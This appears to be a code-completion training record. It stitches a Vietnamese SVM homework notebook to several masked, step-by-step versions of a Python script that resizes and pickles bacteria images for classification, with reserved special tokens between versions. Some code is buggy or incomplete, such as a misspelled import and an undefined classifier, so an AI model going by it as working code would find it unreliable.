train_test_split(X, y, test_size=0.2,\n random_state=42)\n", "step-5": "# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %% [markdown]\n# ### Bài tập 1.\n# - <ins>Yêu cầu</ins>: Ý tưởng cơ bản của thuật toán ``Support Vector Machine`` (``SVM``) là gì? Ý tưởng của thuật toán biên mềm (``soft margin``) ``SVM``. Nêu ý nghĩa của siêu tham số ``C`` trong bài toán cực tiểu hàm mất mát.\n# \n# 1. Ý tưởng cơ bản của SVM là đưa toàn bộ dataset vào không gian nhiều chiều (n chiều), từ đó tìm ra mặt phẳng thích hợp nhất (hyperplane) để phân chia\n# 2. Support Vector Machine thuần (hard margin) thì gặp hai vấn đề chính đó là nó chỉ hoạt động trên dataset ``Linearly Separable`` và thứ 2 đó là nó khá nhạy cảm với biến nhiễu (sensitive to noise). Để tránh vấn đề này, chúng ta cần sử dụng một mô hình linh hoạt \n# hơn. Nhiệm vụ của nó là tìm được mặt phẳng vẫn phân loại tốt nhưng chấp nhận sai lệch ở một mức độ chấp nhận được.\n# 3. Tham số `C` là hằng số dương giúp cân đối độ lớn của margin và sự hy sinh của các điểm nằm trong vùng không an toàn. Khi $C = \\infty $ hoặc rất lớn, Soft Margin SVM trở thành Hard Margin SVM.\n# %% [markdown]\n# ### Bài tập 2.\n# - <ins>Yêu cầu</ins>: Sử dụng mô hình ``SVM`` thuộc thư viện ``sklearn`` để xây dựng mô hình phân loại dựa trên tập dữ liệu huấn luyện ``X_train``, ``y_train``. Hãy nhận xét về tỉ lệ nhãn ``0`` và ``1`` trong bộ dữ liệu đã cho như đoạn code bên dưới. Hãy thử thay đổi giá trị của tham số ``C`` và nhận xét các độ đo ``Recall``, ``Precison``, ``F1-score``, và ``Accuracy`` của mô hình thu được trên tập dữ liệu kiểm tra ``X_test``, ``y_test``.\n# - Nguồn tham khảo dữ liệu ``thyroid_sick.csv``: https://archive.ics.uci.edu/ml/datasets/Thyroid+Disease\n\n# %%\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\nimport itertools\nimport numpy as np\nfrom sklearn import preprocessing\n\n# %%\ndf = pd.read_csv('thyroid_sick.csv')\nX = df[[column_name for column_name in df.columns if column_name != 'classes']]\ny = df[['classes']]\nX = preprocessing.StandardScaler().fit(X).transform(X.astype(float))\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)\n\n\n# %%\ndf.pivot_table(index =['classes'], aggfunc='size')\n\n# %% [markdown]\n# * Nhận xét:\n\n# %%\nfrom sklearn import svm\nC_parameter = 10.5\nmean_acc = []\nfor n in np.arange(0.5, C_parameter, 0.5):\n \n #Train Model and Predict \n clf = svm.SVC(C=n).fit(X_train,y_train)\n yhat=clf.predict(X_test)\n cnf_matrix = confusion_matrix(y_test, yhat)\n\n mean_acc.append(float(accuracy_score(y_test, yhat)))\n print(\"Result with C = \" + str(n))\n np.set_printoptions(precision=2)\n print (classification_report(y_test, yhat))\n\nprint( \"The best accuracy was with\", max(mean_acc), \"with C=\", n)\n\n# %% [markdown]\n# ### Bài tập 3.\n# - <ins>Yêu cầu</ins>: Ý tưởng của hàm ``kernel`` $K(\\dots, \\dots)$ là gì? Khi nào chúng ta áp dụng hàm ``kernel``? Chúng ta có cần biết biểu thức của hàm $\\Phi(x)$ không?\n# 1. Kernel SVM là việc đi tìm một hàm số biến đổi dữ liệu $x$ từ không gian feature ban đầu thành dữ liệu trong một không gian mới bằng hàm số $\\Phi(\\mathbf{x})$. Hàm số này cần thoả mãn mục đích đó là tronng không gian mới, dữ liệu giữa hai classes là phân biệt tuyến tính hoặc gần như phần biệt tuyến tính.\n# 2. Chúng ta áp dụng hàm ``kernel`` khi dữ liệu không phân biệt tuyến tính, Với dữ liệu gần phân biệt tuyến tính, linear và poly kernels cho kết quả tốt hơn.\n# 3.\n# %% [markdown]\n# ### Bài tập 4.\n# - <ins>Yêu cầu</ins>: Cho điểm dữ liệu trong không gian hai chiều $x = [x_1, x_2]^T$ và hàm biến đổi sang không gian năm chiều $\\Phi(x) = [1, \\sqrt{2}x_1, \\sqrt{2}x_2, x_1^2, \\sqrt{2}x_1x_2, x_2^2]^T$. Hãy tính hàm ``kernel`` $K(a, b)$.\n# \n# \\begin{eqnarray}\n# \\Phi(\\mathbf{x})^T\\Phi(\\mathbf{z}) &=& [1, \\sqrt{2} x_1, \\sqrt{2} x_2, x_1^2, \\sqrt{2} x_1x_2, x_2^2] [1, \\sqrt{2} z_1, \\sqrt{2} z_2, z_1^2, \\sqrt{2} z_1z_2, z_2^2]^T \\\\\n# &=& 1 + 2x_1z_1 + 2x_2z_2 + x_1^2x_2^2 + 2x_1z_1x_2z_2 + x_2^2z_2^2 \\\\\n# &=& (1 + x_1z_1 + x_2z_2)^2 = (1 + \\mathbf{x}^T\\mathbf{z})^2 = k(\\mathbf{x}, \\mathbf{z})\n# \\end{eqnarray}\n# %% [markdown]\n# ### Bài tập 5.\n# - <ins>Yêu cầu</ins>: Giả sử bạn dùng bộ phân loại ``SVM`` với hàm ``kernel`` (radial basis function) ``RBF`` cho tập huấn luyện và thấy mô hình phân loại chưa tốt. Để cải thiện, bạn sẽ giảm hay tăng tham số $\\gamma$ trong công thức hàm ``kernel``, tham số ``C`` trong hàm mất mát.\n# %% [markdown]\n# ### Bài tập 6. (Exercise 9 trang 174, Chapter 5: Support Vector Machines)\n# - <ins>Yêu cầu</ins>: Huấn luyện một bộ phân lớp ``SVM`` dựa trên bộ dữ liệu ``MNIST`` (dùng để phân loại hình ảnh các ký tự số có cùng kích thước). Bởi vì bộ phân loại ``SVM`` là bộ phân lớp nhị phân, chúng ta sẽ cần sử dụng chiến thuật ``one-versus-the-rest`` để phân loại tất cả ``10`` ký tự số (trong thực tế chúng ta chỉ dùng chiến thuật ``one-versus-one`` trong các trường hợp dữ liệu nhỏ). Bạn hãy báo cáo độ chính xác (``accuracy``) của mô hình đã huấn luyện trên tập test.\n\n# %%\nimport numpy as np\nfrom sklearn.svm import LinearSVC\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import StandardScaler\nmnist = fetch_openml('mnist_784', version=1, cache=True)\n\n# %%\nX = mnist[\"data\"]\ny = mnist[\"target\"].astype(np.uint8)\n\nX_train = X[:60000]\ny_train = y[:60000]\nX_test = X[60000:]\ny_test = y[60000:]\nlin_clf = LinearSVC(random_state=42)\nlin_clf.fit(X_train, y_train)\ny_pred = lin_clf.predict(X_train)\naccuracy_score(y_train, y_pred)\n\n# %%\ny_test_predict =lin_clf.predict(X_test)\naccuracy_score(y_test, y_test_predict)\n# %%\nScaler = StandardScaler()\nX_train_scaled = Scaler.fit_transform(X_train.astype(np.float32))\nX_test_scaled = Scaler.fit_transform(X_test.astype(np.float32))\n# %%\nlin_clf = LinearSVC(random_state =42)\nlin_clf.fit(X_train, y_train)\ny_pred = lin_clf.predict(X_train)\naccuracy_score(y_train, y_pred)\n# %%\ny_test_predict = lin_clf.predict(X_test_scaled)\naccuracy_score(y_test, y_test_predict)\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import reciproca, uniform\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import reciprocal, uniform\nfrom sklearn.svm import SVC\n\nparam_distributions = {\"gamma\": reciprocal(0.001, 0.1), \"C\": uniform(1, 10)}\nrnd_search_cv = RandomizedSearchCV(svm_clf, param_distributions, n_iter=10, verbose=2, cv=3)\nrnd_search_cv.fit(X_train_scaled[:1000], y_train[:1000])\n\n# %% [markdown]\n# ### Bài tập 7. (Exercise 10 trang 174, Chapter 5: Support Vector Machines)\n# - <ins>Yêu cầu</ins>: Hãy huấn luyện một mô hình hồi quy tuyến tính với dữ liệu giá nhà ``California housing dataset``.\n\n# %%\nfrom sklearn.datasets import fetch_california_housing\nfrom sklearn.model_selection import train_test_split\n\n\nhousing = fetch_california_housing()\nX = housing[\"data\"]\ny = housing[\"target\"]\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> def rotate_img(image, angle, color, filter=Image.NEAREST): if image.mode == 'P' or filter == Image.NEAREST: matte = Image.new('1', image.size, 1) else: matte = Image.new('L', image.size, 255) bg = Image.new(image.mode, image.size, color) bg.paste(image.rotate(angle, filter), matte.rotate(angle, filter)) return bg def make_greyscale_white_bg(im, r, b, g): im = im.convert('RGBA') data = np.array(im) red, green, blue, alpha = data.T grey_areas = (red == r) & (blue == b) & (green == g) data[..., :-1][grey_areas.T] = 255, 255, 255 im2 = Image.fromarray(data) im2 = im2.convert('L') return im2 <|reserved_special_token_0|> def maybe_pickle(data_folders, min_num_images_per_class, force=False): dataset_names = [] folders_list = os.listdir(data_folders) for folder in folders_list: curr_folder_path = os.path.join(data_folders, folder) if os.path.isdir(curr_folder_path): set_filename = curr_folder_path + '.pickle' dataset_names.append(set_filename) if os.path.exists(set_filename) and not force: print('%s already present - Skipping pickling.' % set_filename) else: print('Pickling %s.' % set_filename) dataset = load_letter(curr_folder_path, min_num_images_per_class) try: with open(set_filename, 'wb') as f: pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL) f.close() except Exception as e: print('Unable to save data to', set_filename, ':', e) return dataset_names <|reserved_special_token_0|> def merge_datasets(pickle_files, train_size, valid_size=0): num_classes = len(pickle_files) valid_dataset, valid_labels = make_arrays(valid_size, image_size) train_dataset, train_labels = make_arrays(train_size, image_size) vsize_per_class = valid_size // num_classes tsize_per_class = train_size // num_classes start_v, start_t = 0, 0 end_v, end_t = vsize_per_class, tsize_per_class end_l = vsize_per_class + tsize_per_class for label, pickle_file in enumerate(pickle_files): try: with open(pickle_file, 'rb') as f: letter_set = pickle.load(f) f.close() np.random.shuffle(letter_set) if valid_dataset is not None: valid_letter = letter_set[:vsize_per_class, :, :] valid_dataset[start_v:end_v, :, :] = valid_letter valid_labels[start_v:end_v] = label start_v += vsize_per_class end_v += vsize_per_class train_letter = letter_set[vsize_per_class:end_l, :, :] train_dataset[start_t:end_t, :, :] = train_letter train_labels[start_t:end_t] = label start_t += tsize_per_class end_t += tsize_per_class except Exception as e: print('Unable to process data from', pickle_file, ':', e) raise return valid_dataset, valid_labels, train_dataset, train_labels <|reserved_special_token_0|> def randomize(dataset, labels): permutation = np.random.permutation(labels.shape[0]) shuffled_dataset = dataset[permutation, :, :] shuffled_labels = labels[permutation] return shuffled_dataset, shuffled_labels <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def rotate_img(image, angle, color, filter=Image.NEAREST): if image.mode == 'P' or filter == Image.NEAREST: matte = Image.new('1', image.size, 1) else: matte = Image.new('L', image.size, 255) bg = Image.new(image.mode, image.size, color) bg.paste(image.rotate(angle, filter), matte.rotate(angle, filter)) return bg def make_greyscale_white_bg(im, r, b, g): im = im.convert('RGBA') data = np.array(im) red, green, blue, alpha = data.T grey_areas = (red == r) & (blue == b) & (green == g) data[..., :-1][grey_areas.T] = 255, 255, 255 im2 = Image.fromarray(data) im2 = im2.convert('L') return im2 def process_images(folder): classes = [os.path.join(folder, d) for d in sorted(os.listdir(folder))] img_cnt = 0 for class_x in classes: if os.path.isdir(class_x): images = [os.path.join(class_x, i) for i in sorted(os.listdir( class_x)) if i != '.DS_Store'] for image in images: img_cnt = img_cnt + 1 if img_cnt % 1000 == 0: print('Processed %s images' % str(img_cnt)) im = Image.open(image) im = im.resize(dimensions) im.save(image) print('Finished processing images, images found = ') print(img_cnt) <|reserved_special_token_0|> def load_letter(folder, min_num_images): image_files = os.listdir(folder) dataset = np.ndarray(shape=(len(image_files), image_size, image_size, 3 ), dtype=np.float32) print(dataset.shape) num_images = 0 for image_index, image in enumerate(image_files): image_file = os.path.join(folder, image) try: image_data = (ndimage.imread(image_file).astype(float) - pixel_depth / 2) / pixel_depth print(image_data.shape) if image_data.shape != (image_size, image_size, 3): raise Exception('Unexpected image shape: %s' % str( image_data.shape)) dataset[num_images, :, :] = image_data num_images = num_images + 1 except IOError as e: print('Could not read:', image_file, ':', e, "- it's ok, skipping." ) dataset = dataset[0:num_images, :, :] if num_images < min_num_images: raise Exception('Many fewer images than expected: %d < %d' % ( num_images, min_num_images)) print('Full dataset tensor:', dataset.shape) print('Mean:', np.mean(dataset)) print('Standard deviation:', np.std(dataset)) return dataset def maybe_pickle(data_folders, min_num_images_per_class, force=False): dataset_names = [] folders_list = os.listdir(data_folders) for folder in folders_list: curr_folder_path = os.path.join(data_folders, folder) if os.path.isdir(curr_folder_path): set_filename = curr_folder_path + '.pickle' dataset_names.append(set_filename) if os.path.exists(set_filename) and not force: print('%s already present - Skipping pickling.' % set_filename) else: print('Pickling %s.' % set_filename) dataset = load_letter(curr_folder_path, min_num_images_per_class) try: with open(set_filename, 'wb') as f: pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL) f.close() except Exception as e: print('Unable to save data to', set_filename, ':', e) return dataset_names <|reserved_special_token_0|> def make_arrays(nb_rows, img_size): if nb_rows: dataset = np.ndarray((nb_rows, img_size, img_size, 3), dtype=np.float32 ) labels = np.ndarray(nb_rows, dtype=np.int32) else: dataset, labels = None, None return dataset, labels def merge_datasets(pickle_files, train_size, valid_size=0): num_classes = len(pickle_files) valid_dataset, valid_labels = make_arrays(valid_size, image_size) train_dataset, train_labels = make_arrays(train_size, image_size) vsize_per_class = valid_size // num_classes tsize_per_class = train_size // num_classes start_v, start_t = 0, 0 end_v, end_t = vsize_per_class, tsize_per_class end_l = vsize_per_class + tsize_per_class for label, pickle_file in enumerate(pickle_files): try: with open(pickle_file, 'rb') as f: letter_set = pickle.load(f) f.close() np.random.shuffle(letter_set) if valid_dataset is not None: valid_letter = letter_set[:vsize_per_class, :, :] valid_dataset[start_v:end_v, :, :] = valid_letter valid_labels[start_v:end_v] = label start_v += vsize_per_class end_v += vsize_per_class train_letter = letter_set[vsize_per_class:end_l, :, :] train_dataset[start_t:end_t, :, :] = train_letter train_labels[start_t:end_t] = label start_t += tsize_per_class end_t += tsize_per_class except Exception as e: print('Unable to process data from', pickle_file, ':', e) raise return valid_dataset, valid_labels, train_dataset, train_labels <|reserved_special_token_0|> def randomize(dataset, labels): permutation = np.random.permutation(labels.shape[0]) shuffled_dataset = dataset[permutation, :, :] shuffled_labels = labels[permutation] return shuffled_dataset, shuffled_labels <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def rotate_img(image, angle, color, filter=Image.NEAREST): if image.mode == 'P' or filter == Image.NEAREST: matte = Image.new('1', image.size, 1) else: matte = Image.new('L', image.size, 255) bg = Image.new(image.mode, image.size, color) bg.paste(image.rotate(angle, filter), matte.rotate(angle, filter)) return bg def make_greyscale_white_bg(im, r, b, g): im = im.convert('RGBA') data = np.array(im) red, green, blue, alpha = data.T grey_areas = (red == r) & (blue == b) & (green == g) data[..., :-1][grey_areas.T] = 255, 255, 255 im2 = Image.fromarray(data) im2 = im2.convert('L') return im2 def process_images(folder): classes = [os.path.join(folder, d) for d in sorted(os.listdir(folder))] img_cnt = 0 for class_x in classes: if os.path.isdir(class_x): images = [os.path.join(class_x, i) for i in sorted(os.listdir( class_x)) if i != '.DS_Store'] for image in images: img_cnt = img_cnt + 1 if img_cnt % 1000 == 0: print('Processed %s images' % str(img_cnt)) im = Image.open(image) im = im.resize(dimensions) im.save(image) print('Finished processing images, images found = ') print(img_cnt) process_images(test_folder) process_images(train_folder) print('ok') <|reserved_special_token_0|> def load_letter(folder, min_num_images): image_files = os.listdir(folder) dataset = np.ndarray(shape=(len(image_files), image_size, image_size, 3 ), dtype=np.float32) print(dataset.shape) num_images = 0 for image_index, image in enumerate(image_files): image_file = os.path.join(folder, image) try: image_data = (ndimage.imread(image_file).astype(float) - pixel_depth / 2) / pixel_depth print(image_data.shape) if image_data.shape != (image_size, image_size, 3): raise Exception('Unexpected image shape: %s' % str( image_data.shape)) dataset[num_images, :, :] = image_data num_images = num_images + 1 except IOError as e: print('Could not read:', image_file, ':', e, "- it's ok, skipping." ) dataset = dataset[0:num_images, :, :] if num_images < min_num_images: raise Exception('Many fewer images than expected: %d < %d' % ( num_images, min_num_images)) print('Full dataset tensor:', dataset.shape) print('Mean:', np.mean(dataset)) print('Standard deviation:', np.std(dataset)) return dataset def maybe_pickle(data_folders, min_num_images_per_class, force=False): dataset_names = [] folders_list = os.listdir(data_folders) for folder in folders_list: curr_folder_path = os.path.join(data_folders, folder) if os.path.isdir(curr_folder_path): set_filename = curr_folder_path + '.pickle' dataset_names.append(set_filename) if os.path.exists(set_filename) and not force: print('%s already present - Skipping pickling.' % set_filename) else: print('Pickling %s.' % set_filename) dataset = load_letter(curr_folder_path, min_num_images_per_class) try: with open(set_filename, 'wb') as f: pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL) f.close() except Exception as e: print('Unable to save data to', set_filename, ':', e) return dataset_names <|reserved_special_token_0|> def make_arrays(nb_rows, img_size): if nb_rows: dataset = np.ndarray((nb_rows, img_size, img_size, 3), dtype=np.float32 ) labels = np.ndarray(nb_rows, dtype=np.int32) else: dataset, labels = None, None return dataset, labels def merge_datasets(pickle_files, train_size, valid_size=0): num_classes = len(pickle_files) valid_dataset, valid_labels = make_arrays(valid_size, image_size) train_dataset, train_labels = make_arrays(train_size, image_size) vsize_per_class = valid_size // num_classes tsize_per_class = train_size // num_classes start_v, start_t = 0, 0 end_v, end_t = vsize_per_class, tsize_per_class end_l = vsize_per_class + tsize_per_class for label, pickle_file in enumerate(pickle_files): try: with open(pickle_file, 'rb') as f: letter_set = pickle.load(f) f.close() np.random.shuffle(letter_set) if valid_dataset is not None: valid_letter = letter_set[:vsize_per_class, :, :] valid_dataset[start_v:end_v, :, :] = valid_letter valid_labels[start_v:end_v] = label start_v += vsize_per_class end_v += vsize_per_class train_letter = letter_set[vsize_per_class:end_l, :, :] train_dataset[start_t:end_t, :, :] = train_letter train_labels[start_t:end_t] = label start_t += tsize_per_class end_t += tsize_per_class except Exception as e: print('Unable to process data from', pickle_file, ':', e) raise return valid_dataset, valid_labels, train_dataset, train_labels <|reserved_special_token_0|> print('Training:', train_dataset.shape, train_labels.shape) print('Validation:', valid_dataset.shape, valid_labels.shape) def randomize(dataset, labels): permutation = np.random.permutation(labels.shape[0]) shuffled_dataset = dataset[permutation, :, :] shuffled_labels = labels[permutation] return shuffled_dataset, shuffled_labels <|reserved_special_token_0|> try: f = open(pickle_file, 'wb') save = {'train_dataset': train_dataset, 'train_labels': train_labels, 'valid_dataset': valid_dataset, 'valid_labels': valid_labels} pickle.dump(save, f, pickle.HIGHEST_PROTOCOL) f.close() except Exception as e: print('Unable to save data to', pickle_file, ':', e) raise <|reserved_special_token_0|> print('Compressed pickle size:', statinfo.st_size) <|reserved_special_token_1|> from __future__ import print_function import matplotlib.pyplot as plt import numpy as np import os import sys import tarfile import tensorflow as tf from IPython.display import display, Image from scipy import ndimage from sklearn.linear_model import LogisticRegression from six.moves.urllib.request import urlretrieve from six.moves import cPickle as pickle from PIL import Image from six.moves import range train_folder = './data/train' test_folder = './data/valid' dimensions = 229, 229 max_angle = 15 def rotate_img(image, angle, color, filter=Image.NEAREST): if image.mode == 'P' or filter == Image.NEAREST: matte = Image.new('1', image.size, 1) else: matte = Image.new('L', image.size, 255) bg = Image.new(image.mode, image.size, color) bg.paste(image.rotate(angle, filter), matte.rotate(angle, filter)) return bg def make_greyscale_white_bg(im, r, b, g): im = im.convert('RGBA') data = np.array(im) red, green, blue, alpha = data.T grey_areas = (red == r) & (blue == b) & (green == g) data[..., :-1][grey_areas.T] = 255, 255, 255 im2 = Image.fromarray(data) im2 = im2.convert('L') return im2 def process_images(folder): classes = [os.path.join(folder, d) for d in sorted(os.listdir(folder))] img_cnt = 0 for class_x in classes: if os.path.isdir(class_x): images = [os.path.join(class_x, i) for i in sorted(os.listdir( class_x)) if i != '.DS_Store'] for image in images: img_cnt = img_cnt + 1 if img_cnt % 1000 == 0: print('Processed %s images' % str(img_cnt)) im = Image.open(image) im = im.resize(dimensions) im.save(image) print('Finished processing images, images found = ') print(img_cnt) process_images(test_folder) process_images(train_folder) print('ok') image_size = 229 pixel_depth = 255.0 def load_letter(folder, min_num_images): image_files = os.listdir(folder) dataset = np.ndarray(shape=(len(image_files), image_size, image_size, 3 ), dtype=np.float32) print(dataset.shape) num_images = 0 for image_index, image in enumerate(image_files): image_file = os.path.join(folder, image) try: image_data = (ndimage.imread(image_file).astype(float) - pixel_depth / 2) / pixel_depth print(image_data.shape) if image_data.shape != (image_size, image_size, 3): raise Exception('Unexpected image shape: %s' % str( image_data.shape)) dataset[num_images, :, :] = image_data num_images = num_images + 1 except IOError as e: print('Could not read:', image_file, ':', e, "- it's ok, skipping." ) dataset = dataset[0:num_images, :, :] if num_images < min_num_images: raise Exception('Many fewer images than expected: %d < %d' % ( num_images, min_num_images)) print('Full dataset tensor:', dataset.shape) print('Mean:', np.mean(dataset)) print('Standard deviation:', np.std(dataset)) return dataset def maybe_pickle(data_folders, min_num_images_per_class, force=False): dataset_names = [] folders_list = os.listdir(data_folders) for folder in folders_list: curr_folder_path = os.path.join(data_folders, folder) if os.path.isdir(curr_folder_path): set_filename = curr_folder_path + '.pickle' dataset_names.append(set_filename) if os.path.exists(set_filename) and not force: print('%s already present - Skipping pickling.' % set_filename) else: print('Pickling %s.' % set_filename) dataset = load_letter(curr_folder_path, min_num_images_per_class) try: with open(set_filename, 'wb') as f: pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL) f.close() except Exception as e: print('Unable to save data to', set_filename, ':', e) return dataset_names train_datasets = maybe_pickle(train_folder, 89, True) test_datasets = maybe_pickle(test_folder, 10, True) def make_arrays(nb_rows, img_size): if nb_rows: dataset = np.ndarray((nb_rows, img_size, img_size, 3), dtype=np.float32 ) labels = np.ndarray(nb_rows, dtype=np.int32) else: dataset, labels = None, None return dataset, labels def merge_datasets(pickle_files, train_size, valid_size=0): num_classes = len(pickle_files) valid_dataset, valid_labels = make_arrays(valid_size, image_size) train_dataset, train_labels = make_arrays(train_size, image_size) vsize_per_class = valid_size // num_classes tsize_per_class = train_size // num_classes start_v, start_t = 0, 0 end_v, end_t = vsize_per_class, tsize_per_class end_l = vsize_per_class + tsize_per_class for label, pickle_file in enumerate(pickle_files): try: with open(pickle_file, 'rb') as f: letter_set = pickle.load(f) f.close() np.random.shuffle(letter_set) if valid_dataset is not None: valid_letter = letter_set[:vsize_per_class, :, :] valid_dataset[start_v:end_v, :, :] = valid_letter valid_labels[start_v:end_v] = label start_v += vsize_per_class end_v += vsize_per_class train_letter = letter_set[vsize_per_class:end_l, :, :] train_dataset[start_t:end_t, :, :] = train_letter train_labels[start_t:end_t] = label start_t += tsize_per_class end_t += tsize_per_class except Exception as e: print('Unable to process data from', pickle_file, ':', e) raise return valid_dataset, valid_labels, train_dataset, train_labels train_size = 89 valid_size = 10 valid_dataset, valid_labels, train_dataset, train_labels = merge_datasets( train_datasets, train_size, valid_size) print('Training:', train_dataset.shape, train_labels.shape) print('Validation:', valid_dataset.shape, valid_labels.shape) def randomize(dataset, labels): permutation = np.random.permutation(labels.shape[0]) shuffled_dataset = dataset[permutation, :, :] shuffled_labels = labels[permutation] return shuffled_dataset, shuffled_labels train_dataset, train_labels = randomize(train_dataset, train_labels) valid_dataset, valid_labels = randomize(valid_dataset, valid_labels) pickle_file = './bacteria.pickle' try: f = open(pickle_file, 'wb') save = {'train_dataset': train_dataset, 'train_labels': train_labels, 'valid_dataset': valid_dataset, 'valid_labels': valid_labels} pickle.dump(save, f, pickle.HIGHEST_PROTOCOL) f.close() except Exception as e: print('Unable to save data to', pickle_file, ':', e) raise statinfo = os.stat(pickle_file) print('Compressed pickle size:', statinfo.st_size) <|reserved_special_token_1|> from __future__ import print_function import matplotlib.pyplot as plt import numpy as np import os import sys import tarfile import tensorflow as tf from IPython.display import display, Image from scipy import ndimage from sklearn.linear_model import LogisticRegression from six.moves.urllib.request import urlretrieve from six.moves import cPickle as pickle from PIL import Image from six.moves import range train_folder = './data/train' test_folder = './data/valid' dimensions = (229, 229) max_angle = 15 # rotating image def rotate_img(image, angle, color, filter = Image.NEAREST): if image.mode == "P" or filter == Image.NEAREST: matte = Image.new("1", image.size, 1) # mask else: matte = Image.new("L", image.size, 255) # true matte bg = Image.new(image.mode, image.size, color) bg.paste( image.rotate(angle, filter), matte.rotate(angle, filter) ) return bg # make gray_scale image or 1channel image def make_greyscale_white_bg(im, r, b, g): im = im.convert('RGBA') # Convert to RGBA data = np.array(im) # "data" is a height x width x 4 numpy array red, green, blue, alpha = data.T # Temporarily unpack the bands for readability # Replace grey with white... (leaves alpha values alone...) grey_areas = (red == r) & (blue == b) & (green == g) data[..., :-1][grey_areas.T] = (255, 255, 255) # Transpose back needed im2 = Image.fromarray(data) im2 = im2.convert('L') # convert to greyscale image #im2.show() return im2 def process_images(folder): classes = [os.path.join(folder, d) for d in sorted(os.listdir(folder))] # get list of all sub-folders in folder img_cnt = 0 for class_x in classes: if os.path.isdir(class_x): # get paths to all the images in this folder images = [os.path.join(class_x, i) for i in sorted(os.listdir(class_x)) if i != '.DS_Store'] for image in images: img_cnt = img_cnt + 1 if(img_cnt % 1000 == 0): print("Processed %s images" % str(img_cnt)) im = Image.open(image) im = im.resize(dimensions) # resize image according to dimensions set im.save(image) # overwrite previous image file with new image print("Finished processing images, images found = ") print(img_cnt) process_images(test_folder) process_images(train_folder) print('ok') image_size = 229 # Pixel width and height. pixel_depth = 255.0 # Number of levels per pixel. def load_letter(folder, min_num_images): image_files = os.listdir(folder) dataset = np.ndarray(shape=(len(image_files), image_size, image_size, 3), dtype=np.float32) print(dataset.shape) num_images = 0 for image_index, image in enumerate(image_files): image_file = os.path.join(folder, image) try: image_data = (ndimage.imread(image_file).astype(float) - pixel_depth / 2) / pixel_depth print(image_data.shape) if image_data.shape != (image_size, image_size, 3): raise Exception('Unexpected image shape: %s' % str(image_data.shape)) dataset[num_images, :, :] = image_data num_images = num_images + 1 except IOError as e: print('Could not read:', image_file, ':', e, '- it\'s ok, skipping.') dataset = dataset[0:num_images, :, :] if num_images < min_num_images: raise Exception('Many fewer images than expected: %d < %d' % (num_images, min_num_images)) print('Full dataset tensor:', dataset.shape) print('Mean:', np.mean(dataset)) print('Standard deviation:', np.std(dataset)) return dataset def maybe_pickle(data_folders, min_num_images_per_class, force=False): dataset_names = [] folders_list = os.listdir(data_folders) for folder in folders_list: #print(os.path.join(data_folders, folder)) curr_folder_path = os.path.join(data_folders, folder) if os.path.isdir(curr_folder_path): set_filename = curr_folder_path + '.pickle' dataset_names.append(set_filename) if os.path.exists(set_filename) and not force: # # You may override by setting force=True. print('%s already present - Skipping pickling.' % set_filename) else: print('Pickling %s.' % set_filename) dataset = load_letter(curr_folder_path, min_num_images_per_class) try: with open(set_filename, 'wb') as f: pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL) f.close() except Exception as e: print('Unable to save data to', set_filename, ':', e) return dataset_names train_datasets = maybe_pickle(train_folder, 89, True) test_datasets = maybe_pickle(test_folder, 10, True) def make_arrays(nb_rows, img_size): if nb_rows: dataset = np.ndarray((nb_rows, img_size, img_size, 3), dtype=np.float32) labels = np.ndarray(nb_rows, dtype=np.int32) else: dataset, labels = None, None return dataset, labels def merge_datasets(pickle_files, train_size, valid_size=0): num_classes = len(pickle_files) valid_dataset, valid_labels = make_arrays(valid_size, image_size) train_dataset, train_labels = make_arrays(train_size, image_size) vsize_per_class = valid_size // num_classes tsize_per_class = train_size // num_classes start_v, start_t = 0, 0 end_v, end_t = vsize_per_class, tsize_per_class end_l = vsize_per_class+tsize_per_class for label, pickle_file in enumerate(pickle_files): try: with open(pickle_file, 'rb') as f: letter_set = pickle.load(f) f.close() # let's shuffle the letters to have random validation and training set np.random.shuffle(letter_set) if valid_dataset is not None: valid_letter = letter_set[:vsize_per_class, :, :] valid_dataset[start_v:end_v, :, :] = valid_letter valid_labels[start_v:end_v] = label start_v += vsize_per_class end_v += vsize_per_class train_letter = letter_set[vsize_per_class:end_l, :, :] train_dataset[start_t:end_t, :, :] = train_letter train_labels[start_t:end_t] = label start_t += tsize_per_class end_t += tsize_per_class except Exception as e: print('Unable to process data from', pickle_file, ':', e) raise return valid_dataset, valid_labels, train_dataset, train_labels train_size = 89 valid_size = 10 valid_dataset, valid_labels, train_dataset, train_labels = merge_datasets( train_datasets, train_size, valid_size) # _, _, test_dataset, test_labels = merge_datasets(test_datasets, test_size) print('Training:', train_dataset.shape, train_labels.shape) print('Validation:', valid_dataset.shape, valid_labels.shape) # print('Testing:', test_dataset.shape, test_labels.shape) def randomize(dataset, labels): permutation = np.random.permutation(labels.shape[0]) shuffled_dataset = dataset[permutation,:,:] shuffled_labels = labels[permutation] return shuffled_dataset, shuffled_labels train_dataset, train_labels = randomize(train_dataset, train_labels) # test_dataset, test_labels = randomize(test_dataset, test_labels) valid_dataset, valid_labels = randomize(valid_dataset, valid_labels) pickle_file = './bacteria.pickle' try: f = open(pickle_file, 'wb') save = { 'train_dataset': train_dataset, 'train_labels': train_labels, 'valid_dataset': valid_dataset, 'valid_labels': valid_labels, } pickle.dump(save, f, pickle.HIGHEST_PROTOCOL) f.close() except Exception as e: print('Unable to save data to', pickle_file, ':', e) raise statinfo = os.stat(pickle_file) print('Compressed pickle size:', statinfo.st_size)
flexible
